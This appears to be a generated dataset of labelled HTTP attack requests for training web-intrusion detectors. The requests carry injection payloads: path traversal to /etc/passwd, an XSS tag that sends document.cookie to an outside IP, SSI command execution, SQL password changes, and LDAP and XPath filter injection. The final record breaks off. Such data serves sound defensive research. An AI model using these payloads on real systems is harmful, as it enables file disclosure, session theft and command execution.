ETag: W/"KnKCfoDimSyNjwBe9@oK"
Expect: 100-continue
From: pohawiI@9f0Ofa.ch
If-Modified-Since: Thu, 19 Mar 09 04:49:38 CET
If-Unmodified-Since: Sat, 05 May 07 11:03:11 CET
If-Match: "p5-@7mBKpjv5oW8V-"
If-None-Match: "ZJ@c0dcb2cUyYYIryR-v"
If-Range: Mon, 29 Nov 04 01:16:51 UTC
Max-Forwards: 5
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZXNScWFmc2VueXpMc3Vlb255ZXNudWVhc2JlZXU1clRzaUhlY2lk
Range: 038-33,-803
Referer: /6wi0dvnP/a3iule/chtk/sriea2tl/alem.jsp
TE: chunked,chunked,trailers
Trailer: Connection
User-Agent: Mozilla/6.0 (Machintosh; U; Mac OS X 3.5; ys-Eo; rv:5.7.6) Gecko/17409746
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3095x7377
Via: 4.7 www.9ape.gif
Transfer-Encoding: compress
Upgrade: sEr/5.8, wolisa/6.8
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 242.32.16.78
X-Serial-Number: 9273829516846529
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49769
Start - Id: 44914
class: PathTransversal
GET /izh4_a/9GeV.htm?9a7gi=ltSvycmjinH&etlp1aeisrmuyaa=doc%28++++file%3A%2F%2F%2Fc%3A%2Fut0eO%2Fesw5oot.xml+%29&wee=+f%3Chmeta2nDat%25gxterml&sTirr9htr=rxhsEed8eo&elarxfqt26hfbh=605367&hcinaLeeno=eiz6rXhP HTTP/1.1
Host: www.khiYop.net
Connection: 4osz
Accept: */*
Accept-Charset: x-mac-ce;q=0.1
Accept-Encoding: 
Accept-Language: d2-t;q=0.2, e5i-hige;q=0.9
Cache-Control: only-if-cached
Client-ip: 117.77.195.37
Cookie: eBntre9n=760665;lpctdooa4aTm=eRh;notogeylklsOth=6593;cHwsao0iietak=dinputitmpf;Huqeahmdociyi=54
Cookie2: $Version="49"
Date: Sat, 13 Nov 04 05:58:38 GMT
ETag: W/"GnXifNSu_E2rpuvuvq-Q"
Expect: zttec7
From: ossdo1d@eovryuBei.be
If-Modified-Since: Wed, 09 Mar 05 24:20:40 CET
If-Unmodified-Since: Tue, 14 Jul 09 03:46:41 GMT
If-Match: "GbrB286y-PcpRtyl"
If-None-Match: *
If-Range: Tue, 01 Jul 08 09:38:13 CET
Max-Forwards: 9417
MIME-Version: 0.6
Pragma: t='xn3a'
Proxy-Authorization: Basic ZUVpejZkbm06ZlhjM2ht
Authorization: c1Da srtarpts=Atit
Range: 50635-77
Referer: /sserh/YAtm69.php3
TE: trailers,gzip;q=0.5
Trailer: Accept-Encoding
User-Agent: aItdtyrelhsSe
UA-CPU: StrongARM
UA-Disp: 2288,5387,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6797x3315
Via: FTP/5.8 207.104.136.242:6, emEate/3.5 193.243.86.99, 0.5 213.49.248.186
Transfer-Encoding: roDnih
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 988 www.oihee.jpg:20 "etxoOiolmnofnnjob1c" "Mon, 09 Mar 09 19:24:20 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 44914
Start - Id: 48001
class: XSS
GET /smochaopFzP9/nfa/pt7pie/da9EAaMPD21vc/iVWf.kiWYwJhP/hiesfebhhnjeeUsq/URLselectSimscript6iWY/cLMX2Ksq@IselectLcopy-O/tGWv/l.I0CxTELzusvQeshf/a8YKlXOem.mdb?ooEhpuhn=ylqetaohtacces5all+childzye+aC+&inae5tce52vgh1t=15081&Svgq2jzbjs@=mriA%2Fl%29%5Ciuosrnn&ptvrn=aahehtacceshutaoo%2B%24nhtaccesau%3Bei&t4ct56oSao=6eA%3Betplrcp%3Ceoodi&okuaccrota2i=%3Cimg++src%3D%26%7B%5Bwindow.open%28%27http%3A%2F%2F249.183.2.238%2Fngngsi.php%27%2Bdocument.cookie%29%3B%5D%7D%3B+++%3E&huliltn=23&rwsia=trnpytea&sayMearogfli=nfauot8ubTet0hseMe&neaNieoptivulg=l%3Cir&otR=oeoRchprk&m74=8520&konxheryni0sotn=312273&ihinzfhh0=duutI HTTP/1.0
Host: www.exnch.be:28
Connection: eet7ms
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: compress;q=0.6, identity;q=0.2
Accept-Language: *
Cache-Control: min-fresh=5536
Client-ip: 192.143.189.93
Cookie: hel=owp-;rglgqt=rnO;BM2Hlhpmeta=;t;mnumeepGtpmrt=child xlead6s ok2t
Cookie2: $Version="290"
Date: Sun, 05 Apr 09 17:17:30 UTC
ETag: W/"pbjVzqemGJN.290ZUYvt"
Expect: 100-continue
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Mon, 15 Nov 04 20:34:47 CET
If-Unmodified-Since: Sat, 01 Dec 07 14:52:26 UTC
If-Match: "u0m@qrPn4@Mtf@KRCl"
If-None-Match: "vJSUUNrcMV9UkX9NX"
If-Range: Sat, 27 Mar 10 22:21:08 CET
Max-Forwards: 284
MIME-Version: 0.5
Pragma: k='h'
Proxy-Authorization: NTLM YWxlQWN1ZGJ6ZG5iZXJheXRodFJidXBlRXc2N2NibXBodHVLNWVqb0g=
Authorization: NTLM MnN5OWVpc3N3cGxyc2VlaVJ5Ymp0NmVvbzlldGFlZWs=
Range: 209-45720
Referer: http://www.rArew.gov/tqioi7T/ttsss5e/rooed.jsp
TE: gzip;q=0.3,trailers
Trailer: User-Agent
User-Agent: Mozilla/3.3 (compatible; etn3eAy; Win 9x; okeroews)
UA-CPU: StrongARM
UA-Disp: 212,5646,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3266x6869
Via: 7.8 www.aaeEbot2.html, 5.4 35.226.218.10, FTP/8.6 www.ehayCru6.html
Transfer-Encoding: gzip
Upgrade: hrsloe/4.3
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 62.26.34.68
X-Serial-Number: 4179007460908292246
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48001
Start - Id: 46148
class: PathTransversal
GET /GQ1caMWlocation@.d/ahpudnHalege/EVEVafa/Hv2AiIJetcyginnullv/orntvdzmbLpo/o-dU23YA_ajBQvg4r/evnyieerbMsG8/aK5fFodhgP-k.jpeg?tcmooed8orvme=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&qlallr@N0iR-Tm=134714&DPUY8otD=jhhqtra&3sj=-qoex&firfauuTTnJI8h=hhavinge+r HTTP/1.1
Host: www.HqaetckD.cz:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: min-fresh=53
Client-ip: 172.17.95.67
Cookie: afd9dhuGerraar=3;Eodtls2=899990;4GsZuGZEjyD=aSLniIjHNj
Cookie2: $Version="52"
Date: Mon, 04 Jan 10 22:54:51 GMT
ETag: "h5QIf9AhiTTvSnY@l75l"
Expect: 100-continue
From: rnis7ym@dolsohsitn.org
If-Modified-Since: Sun, 01 Jan 06 01:10:49 CET
If-Unmodified-Since: Sat, 20 Feb 10 02:46:20 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 07 Jun 07 09:13:54 UTC
Max-Forwards: 0092
MIME-Version: 8.6
Pragma: i=eei
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: aror iyeebrdb=SAau
Range: 930922-
Referer: http://www.irdi.gov/caweetas.cfm
TE: deflate,deflate;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.6 (Machintosh; U; Mac OS X 4.0; 8a-m1; rv:8.1.4) Gecko/89252217
UA-CPU: x86
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Pixels: 9278x723
Via: 6.0 www.nslvg.png, HTTP/8.7 236.214.149.224, hrel/6.1 www.aoEJee.png
Transfer-Encoding: compress
Upgrade: etn/2.1, heape/0.1, hIsen/6.7, eUiJr/1.4, ehAnb/3.2
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Serial-Number: 678023085
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46148
Start - Id: 49236
class: XPathInjection
GET /no7PadUectnx.L-83xHD/zigidb/icNiaaatwiipsoest/nmHvI/4@SC@f_R/EkmreFbeo/adG.tiff?br=Efe%27+++++or++%28i++++%3C+++++count%28uabeEr%2Fchild%3A%3Atext%28%29%29+++and+j++++%3C+count%28mlfeb%2Fchild%3A%3Acomment%28%29%29++and+++k+++%3C++++count%28dtlrf%2Fchild%3A%3A*%29+++%29+or+%27ee%27++%3D+++%27++sRmt%27+or&taGox7WOC=011533475&nfltaoetl=09&Gtenit=sBrfYYC&ah=ytiuxabbbB2pan&onhaxsnhhysagb=j%3Eet%24c%7Enetcatigroup+by%5Cvhtacces%3D9ht3&l4pst=%3FiEbz&am8=95607 HTTP/1.0
Host: www.nmtetmciaw.gov:20674
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: P-A
Cache-Control: max-stale=98684
Client-ip: 97.195.21.197
Cookie: micaioerygcofn=ur
Cookie2: $Version="911"
Date: Fri, 09 Apr 10 14:47:01 UTC
ETag: W/"@I55TFnnWMOE6wgh"
Expect: 100-continue
From: ebT3@niat.fr
If-Modified-Since: Mon, 29 Dec 08 04:50:04 UTC
If-Unmodified-Since: Wed, 23 Jan 08 11:47:52 UTC
If-Match: "B3dIScTW0-631oqrVre"
If-None-Match: "EdGH8tIYRZaWjxH"
If-Range: Wed, 19 Dec 07 21:52:47 UTC
Max-Forwards: 157
MIME-Version: 5.2
Pragma: johtk='ttQ'
Proxy-Authorization: NTLM d2NybGtuaXlhYXRpWWU4cmVIZDhkZWppaHVhdzFEY2RzYWVud3Rucm1kb2xmUkxk
Authorization: lrtk2e iuti=tps7h
Range: -364650
Referer: /rndhasb/tgenthno/tefacr/tCuue.jpg
TE: gzip;q=0.7,chunked;q=0.2
Trailer: Date
User-Agent: Mozilla/0.7 (Windows; U; Windows NT 3.6; te-oc; rv:2.6.3) Gecko/64950101
UA-CPU: Sparc
UA-Disp: 2447,4165,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 353x220
Via: 1.3 194.30.11.242, 6.1 www.eoxiEct0.css, Isbr6n/5.0 234.74.124.76
Transfer-Encoding: identity
Upgrade: 8rpe5E/5.6, tre/6.8, 6Gt/7.8, xleel/2.7
Warning: 218 61.225.42.189 "r5Iaw8enn" "Mon, 02 Feb 09 06:59:22 GMT"
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 15070707581939695
----: ----------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49236
Start - Id: 36256
class: PathTransversal
PUT /ddwwsS9y/omteubft/telnetIocconnectblFI/pkeKf/eSpNw.Xf.swf? HTTP/1.1
Content-Length: 286
Content-Language: rvsf8ao,re9te,eutto7
Content-Encoding: gzip
Content-Location: /qopouDrd/uccjictu/sxmh/i7itoRqs.conf
Content-MD5: dGVjcnNwbVNpdG1ldGVoUw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 22 Jul 04 13:52:54 CET
Last-Modified: Sun, 01 Feb 09 12:08:25 UTC
Host: 63.136.31.207
Connection: keep-alive
Accept: application/*;q=0.0, image/*, video/quicktime;q=0.5
Accept-Charset: x-mac-cyrillic, iso-8859-3, x-mac-japanese;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 44.220.122.164
Cookie: rNopadbwagmeo2t=eIlM;9tginmnP=qK11jFCRb;1irss0ovoik=oeweeunthunOs;KtNQwEJOMRB=6
Cookie2: $Version="1"
Date: Thu, 08 Apr 04 12:18:06 CET
ETag: W/"jRY8PxZkXX-fCGouhR8"
Expect: eigacm=eafotax;3ngniEI=1owL6ot
From: tarcw@rtJihd7rad.st
If-Modified-Since: Wed, 28 Mar 07 16:19:32 CET
If-Unmodified-Since: Tue, 27 Nov 07 15:16:24 GMT
If-Match: "x4aNwGZQrBQOuTDN5c"
If-None-Match: "FNgOUp_BeNPShhitxQ"
If-Range: Wed, 04 Mar 09 09:55:38 UTC
Max-Forwards: 4
MIME-Version: 4.1
Authorization: NTLM ZWwzM21vaHJpZGNpZndlOWhjZTF0TnJ6ZTkyU2x1aGxtZHJudHExbnRWamlO
Referer: http://www.r7Uer.net/xldeeI/eedoTe.php3
User-Agent: iStpzQ. http://www.aonte.be
Transfer-Encoding: compress
Warning: 120 183.198.212.10 "5hoema" "Mon, 27 Nov 06 04:28:46 GMT"
X-Serial-Number: 373561345188
----: ------------------------------

qYsirciyVef9=9&iiNnhqot=?w R]&dfiec=eodLW_8&ltelm=0&nb5gmea=lbinsert&dhnabezordSmht=tWn10_x&ibr9g=haari&ainputggI6D1=495&OeaN=43027&itaUljeac7sd=154671800&exuohnn5nehl=../../../../../../../../../etc/passwd&lpeeads=abhLPE@&YvhDy9Cm=xjbnzF9&uuh=hz&OcQ9O=36822413

End - Id: 36256
Start - Id: 38632
class: LdapInjection
GET /o6MF-QmqpKfDo6hmC/dGdf3/e427bMxb7IRlmmY4wLE/54rYqUSKfXo@X/iyV4J0A7din.S_bV4@./duJNp7wdn7mr/eJVdcvMMCQ_jfz/t5VAnnsSQJKxTauZ/hia3ehE5llbslamlb/noncrmd.asmx?oeaa0emnwtu=6mE0Id&fB2Utnw=24&ehvkES0n=sPx95f&tyil7ii5=h&anaP=3878&rha1thiwait=rs%26e%40&8oa=f1tK+a%3F%2B&3lis8nfic=90342&nals8odtestrcbi=27&ryTe9ipk=ibZh%40XDgVIt&aVc=6189&Ehebstmtowfng=72&ahearsacn=3v+bw&mjkQVFGM=efiT%29%28%26%28objectClass++%3D+++rwot*%29&utttbct0e8alex=7h13 HTTP/1.0
Host: www.gbtcegiAit.uk:1846
Connection: close
Accept: */*;q=0.2
Accept-Charset: windows-1250, iso-8859-5;q=0.6, big5, cp-950, x-mac-chinesesimp;q=0.2
Accept-Encoding: deflate;q=0.7, gzip, gzip;q=0.4, deflate;q=0.4, gzip
Accept-Language: *
Cache-Control: 8xmotuen=resposdt
Client-ip: 208.123.158.22
Cookie: rireee5ehalr=0132;mr=sXKXyXKia2QE
Cookie2: $Version="0"
Date: Thu, 01 Feb 07 24:25:56 GMT
ETag: W/"vITvz6y6nZ8bl.S"
Expect: 100-continue
From: snRe@zteSps5r.net
If-Modified-Since: Thu, 04 Jun 09 06:47:30 GMT
If-Unmodified-Since: Tue, 30 Dec 08 07:41:44 UTC
If-Match: "-BvHRjm7@GtoREvJO"
If-None-Match: "69-mZHCTnhnLPODUQ"
If-Range: Fri, 02 Apr 10 04:03:31 GMT
Max-Forwards: 3
MIME-Version: 8.5
Pragma: 9l3b='l16tnr'
Proxy-Authorization: NTLM dGRrNTRlNG5ubG1kSGxuZXpzRW90ZWZkdHMydXlnbHJkc3I3bndHb2V5aGU=
Authorization: NTLM dWVFZWNnN1NlZVVlcE1oaUxpVHR5bWVxdG9SaWVsYUxvcm5zbjRlcmN6dG4=
Range: 2-163
Referer: /tiwz5v/jic6aEea/ioByD/rsdrrst.swf
TE: gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: Mozilla/1.2 (compatible; vifir; Solaris; fntshEial; aghhNemss; hiteih)
UA-CPU: MIPS
UA-Disp: 397,637,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 601x4009
Via: 9.2 www.rfxEnct.shtml
Transfer-Encoding: identity
Upgrade: ehlec/7.4, tt07/0.9, ls7e/0.7
Warning: 873 www.crqmw.shtml "oisUjyPexehaoceb" "Mon, 12 Nov 07 06:17:25 UTC"
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 53440991
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38632
Start - Id: 36838
class: OsCommanding
POST /Oh/tweo.SzC5n1jK4axxm9x/hUh/eUQByH9ZO@u/uEwe/1soaitdmar/syH8lpq9qAhA/w7Rgowrgann.mspx? HTTP/1.1
Content-Length: 76
Content-Language: s,6nes9,kava
Content-Encoding: identity
Content-Location: http://www.fSEytf.fr/qslqd/cSkafsoa/cbodei7.pl
Content-MD5: ZXZzZmxGY3Q0cmN0YWFvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 28 Apr 06 23:30:12 UTC
Host: 15.215.119.20
Connection: fstecec
Accept: image/*;q=0.1, audio/x-wav;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: &%20id|
Cache-Control: max-stale
Cookie: ik854gEGabrvcp=4vekltN@e7a ;rwejc0aocfoyn=85143695;ohimsqazti=tqe rCctb;m1rpyU8p= connect;Z0tGkw4=n;pr;etsree1ooeoit=rqrCneoaw5Oiin
Date: Thu, 17 Aug 06 10:52:16 CET
ETag: W/"M-7mrO2@3AcYJckwqMZR"
If-Match: "3HOFT@82B3t71KZv"
If-None-Match: *
If-Range: *
Max-Forwards: 4
Pragma: no-cache
Authorization: Basic cmlvcmhhczpoc3JB
Range: 29-
Referer: /ws6m/sl6c9/ltlron/ticolie/nee2usi.php4
TE: chunked;q=0.5,gzip;q=0.1,gzip
User-Agent: 6smtqdieoa (iuOqiGZ._; 1ayIF.; vsLi7C8XTZ)
UA-Color: color8
Via: n2tF/9.8 www.dexkeet.html, 4.3 133.166.134.235:94
Transfer-Encoding: deflate
----: -----------------------

lr=hU&BFoq=zrpassthruedlgsss&pudp=7&uihf=3&itsSeligle2enoo=658325&cet=089784

End - Id: 36838
Start - Id: 48853
class: XPathInjection
GET /w76mh/mGzutXG94n/htuCTh2osf2eckt4G1hk/i14hRIY/h9ioep3st6hs.swf?hoAhRt=ed+samaa&fyd4ewit=lueoxhLx%5Dh%3An+tinterh&AwYb=hhobehpacs&9fr7eoeneraygog=%5Cty&@-3e2H5urNB=P8%3Aa%3CAnyvl%3Btn&bombnetieral7oz=55&tan=eeedrn3A4n&u@eq=c6hntokeNk&pofe=twp&iswteg45=ml%27++++or+++5mo%2Fgt%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D29%5D++++or+++%27mxz%27%3D++%27&en1hyEandhojo5=Raisa&0rremeSH5Nd=e3sjteaehs3s&eP1dna8cw=seeeotzoebt8sdeue&a6o1Sph=soh&weurhtioe=EMzhLirus%3Bh%28 HTTP/1.0
Host: www.ahweRysd.cz:27104
Connection: glEnrlno
Accept: video/mpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 250.77.251.179
Cookie: @vbscriptKmocha6abgsoundd=ltDibesngldst4tg8;teeo1=y E8McthiTgconnectpassthrun;ebskfiimtl0he=i7iX-Zdui_JL;nsduy68a=a7>Oaotmetaualhe;XB6U6PVEvl0=st9nsaii
Cookie2: $Version="97"
Date: Thu, 20 Aug 09 07:08:20 GMT
ETag: W/"rIDx8tDHtimlHt6H6"
Expect: akafu79
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Sat, 22 Sep 07 17:53:36 CET
If-Unmodified-Since: Mon, 09 Apr 07 08:37:48 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM a05vZXJvNWU1aHRyaGFzM21hblBscHNuZWliMmh0RXRp
Authorization: Basic YU5oYmFucnI6aDg0ZWxUbnM=
Range: 5-03627
Referer: /satixt.swf
TE: chunked,chunked;q=0.5
Trailer: Accept-Charset
User-Agent: iieipjnson (rO3mVdh@8; 3aT5@QkDM; aU8.Lg; opgk0ER)
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 842x5954
Via: 3.3 www.k8eekecS.shtml:61, FTP/8.6 193.19.0.134, tao/8.4 www.tilfqe5i.htm
Transfer-Encoding: compress
Upgrade: Anfn/8.5, ere/1.4, 8ssixi/3.7, oAe/9.3, enwsi/1.1
Warning: 687 108.217.115.97 "lnedeee" 
X-Forwarded-For: 239.247.179.124
X-Serial-Number: 177199337529573688
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48853
Start - Id: 50070
class: XPathInjection
PUT /reofyitl/9Fe/t0tt0.php4? HTTP/1.0
Content-Length: 218
Content-Language: ugdzml
Content-Encoding: compress
Content-Location: http://spnj6.cz/isids/AaIoaiz/oenyrso4/tnexitip.php3
Content-MD5: VEFFYWRFOGl2ZGV0N3lEbA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Jun 07 05:32:14 UTC
Last-Modified: Tue, 12 Aug 08 14:05:43 GMT
Host: 159.202.161.252:80
Connection: odmI8Il
Accept: audio/basic;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 249.109.13.134
Cookie: ecsW1neebdfmRr=0;Ce6hMaer=4271087;aqg9traunrthr=1712020;he=2985  or     count(path/child::node()[position()=((i+j+k+l+1)]   |   path/child::*()[position()=(k+1)])=1    or   0717=
Cookie2: $Version="067"
Date: Sun, 22 May 05 14:54:07 GMT
ETag: "OQ00ds6-4qTz@xRodc2"
Expect: 100-continue
From: fmsevou7@scdhg.org
If-Modified-Since: Tue, 22 Dec 09 15:51:57 UTC
If-Unmodified-Since: Sun, 08 Jun 08 23:55:09 GMT
If-Match: "HXMzqGpRkoqJDPD9l5E"
If-None-Match: *
If-Range: *
Max-Forwards: 5409
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest username="7btlnr"
Authorization: Digest response="ff2A3DB6cC2aFbaEB0cd7DffeEb2bDD6"
Range: -54961,-527946
Referer: http://eanr8hcn.com/eMSElj/n9nreNi/hoaNr/sneoi.cgi
TE: deflate;q=0.4,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/9.8 (X11; U; Solaris 3.4; og-ns; rv:8.1.5) Gecko/23540236
UA-CPU: MIPS
UA-OS: Linux
UA-Color: color16
Via: 5.6 www.ynnpb.jpeg:7109, HTTP/8.4 242.14.168.194, foa/8.8 www.rtenti.js
Transfer-Encoding: compress
Upgrade: t0zcmd/8.9, T6lh/5.7, i2nor/4.8
Warning: 920 68.7.73.211:327 "dtcrtN3selaP" "Sun, 01 Mar 09 19:19:25 UTC"
X-Forwarded-For: 109.8.17.168
X-Serial-Number: 7706137339347
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

taaeIlTnse=yautoexecv>rmvaroacceptaW&mwS-RY6J6XvV=5427390031&elXgdePerst=otobef&bsaHmeosnne=eu7V8GKia&u7aonrehSa=o&onFn=vyEtelnet?r srypso&olaademthbu=63504&ote2ises=ncs73Tot>feideo&ImbagqeanO4=> i0s1a&pten9=05

End - Id: 50070
Start - Id: 39906
class: SSI
PUT /eua/8RHwinntB5GMcV.LP/zyr4C0FXQnoJ6hpR/iVGxplrX.lfKuQ./2vM/Nechohdiv33w/nETamq8oehtjt9/uIIWV/79NN4BEUlocation.js? HTTP/1.0
Content-Length: 247
Content-Language: ih,e16EdDv
Content-Encoding: gzip
Content-Location: http://tpnfI.uk/nria1rh2/tumc/c2shkc.jpeg
Content-MD5: ZWVzb2VUbnFnc2x0ZXRlaw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 15 Nov 09 09:42:42 GMT
Last-Modified: Tue, 19 Jul 05 03:53:07 UTC
Host: 53.244.4.34
Connection: close
Accept: video/quicktime, text/*
Accept-Charset: iso-8859-7;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=9
Client-ip: 239.36.31.16
Cookie2: $Version="47"
Date: Fri, 25 Aug 06 02:56:31 CET
ETag: "LcgSnpA@w-i3zxL9"
Expect: h0il
From: etiwhOvt@03yWr.net
If-Modified-Since: Sun, 15 Jul 07 11:15:58 CET
If-None-Match: *
If-Range: "Xedi0o0y5rPO_S_4"
Max-Forwards: 424
Pragma: eolsfe='o8Ed'
Authorization: Digest cnonce="DmWeetx"
Referer: http://fgototh.net/ecieeang.bin
TE: trailers,deflate;q=0.8,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.5 (X11; U; Unix 0.6; f9-ca; rv:1.5.1) Gecko/96877651
Via: 9.0 www.1ra43hi.png, 6.8 www.Elrrz.html:87, 3.1 www.engoe.jpeg
Transfer-Encoding: darl; saUcy=zYy4at
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

1oanteklaeoAlis=747&wl72ftpz=<! #<!--#exec cmd="id"-->&3tq9Rm=682&sre=7&LMBpoXetcq=h&ane=447125&Heryi7c0ncar=Enetcatlsystemve ce &iejtseIrr=u&oeb1temberw=7GaW-mavm63&clde9miatlr=1ZJx&OlRP=aw9et&ermrrsaearhi8Au=xetccdusrS6n8Saty

End - Id: 39906
Start - Id: 38708
class: LdapInjection
GET /ttheaEailtaEstoooReo/yJe_FXt/CimisdittgdMxszFi/tP8kSZr@2QTfn03/LEZOaccess_logPWgCR1H/03xLjstyleYHbgsounda6Rv/Ance9RD/e1OXKm-g.FKV9FrwD/xYwyJ90oYu/etufiw9utEaielmjsho/esLC-_df-8XEi0S.grr./ndsut.mdb?4aztiokrs=eDVrT_w-&WPreplacebgsoundG01tfrom=%29++%28+++%7C+%28+cn%3D*o++++%27brien*%29%28mail+++%3D*o+%27brien*+%29&ECn=il HTTP/1.1
Host: 7.184.66.37:4417
Connection: t23nour
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: maibyowe-fqbgrBpx, 2t-nsTtmt;q=0.0, on-nd8uo3d;q=0.3, Masn-herlor9d
Cache-Control: min-fresh=66709
Client-ip: 230.84.78.249
Cookie: t0tnLsaatul=rA9FQ-xW_
Cookie2: $Version="4"
Date: Sat, 12 Sep 09 15:39:24 GMT
ETag: "W_VEAUp25OqZ2HNn5Hk"
Expect: rsracoa
From: ilrb@h5ihiwr.cz
If-Modified-Since: Mon, 19 Mar 07 01:53:34 CET
If-Unmodified-Since: Sat, 18 Feb 06 20:47:00 CET
If-Match: *
If-None-Match: "0pxAnPtJkDnriZ4S3OB"
If-Range: Thu, 31 Aug 06 09:08:23 UTC
Max-Forwards: 742
MIME-Version: 6.8
Pragma: pW=rwsr
Proxy-Authorization: e7fkmh dlnen=ue3t2
Authorization: NTLM dG5zUG5ycmlhdGl3ZW1scnR0Z3RoZXRyb2tqbGVEdGhhdHRlZTA3aVRyZXBFcjk=
Range: 557810-
Referer: http://s1er.gov/nle5te6/roacnNiU/ubtr8I/ddmn2qd.html
TE: trailers
Trailer: If-Modified-Since
User-Agent: cK9@6fje http://www.xtMAdrei.it
UA-CPU: PowerPC
UA-Disp: 849,080,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 094x3377
Via: FTP/7.0 www.zoon.css
Transfer-Encoding: compress
Upgrade: xorad/3.4, wEIe/7.5, ten/7.9, acen/0.3
Warning: 442 77.207.105.249 "n0tcfehentkl" 
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 0697506678006
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38708
Start - Id: 41354
class: SqlInjection
GET /tYO@hCG5xleFZ4b6GIK/SsZ8eZeDXqd/9eusroeeaa.png? HTTP/1.0
Host: www.7roxmw8.uk:80
Connection: close
Accept: text/*, image/png;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, gzip;q=0.8, gzip
Accept-Language: *
Cache-Control: max-stale
Cookie: Tchild0tV=Sjaz0|rupmoy;ktmnhsaeju6nv=;alter     table  eniset     set   password  =    'Heo7'     where     name  =     'dlOb';
Date: Sat, 10 Jul 04 15:17:33 UTC
ETag: W/"uT_6lGaOYIemlqU4kP"
If-None-Match: *
If-Range: Tue, 12 Jan 10 02:02:15 CET
Max-Forwards: 59
Proxy-Authorization: NTLM dUVkdGVyakFoeUM0cHRnYWVoblRtNHNvNmxzNXR0c3Rob2NjZWluNHlmSE9zZW4=
Referer: /ooTZTto/jhTto/etrt.dll
Trailer: Authorization
User-Agent: Mozilla/8.5 (Machintosh; U; Mac OS X 2.5; ae-at; rv:4.4.0) Gecko/20691860

null

End - Id: 41354
Start - Id: 42615
class: SqlInjection
GET /hnLpsN/iritz7eeoi/vWY/oorj4dAsHde6rN/neiedNf4i/tmyGb/aodeetioemsIrrXao/asnAiaieedplluisTpIh/dC.sh?nl=or+++++0%3C%3E%28select+++++count%28*%29++from+++Edf%29&oe7e=a%24s&ieuhjenydoxoncR=9-aqlHei%2B%28i&tSEM@PRT7WM=niframe2r%2Bagroup+bytlndn&aodrahrbe0=359&hslereme=Su&sknee8Actnl=Ei%25&beS4=8053625415&ditpeie=nCffoVxl3&tpC1S=a9JsBbX&rdl=sdeteeHe&Ispeo3ln8Eaa=teT_ex&XN7GL6S=t-L%40jUMs5&rmes6frshrH1ed=Ax7 HTTP/1.1
Host: www.3gtmt.biz
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: euc-kr
Accept-Encoding: 
Accept-Language: qcg4lUug-haVdTses;q=0.5, cFdnepz-enoz;q=0.1, oFnes8oa-tpaXGi8;q=0.3
Cache-Control: no-cache
Client-ip: 198.153.73.22
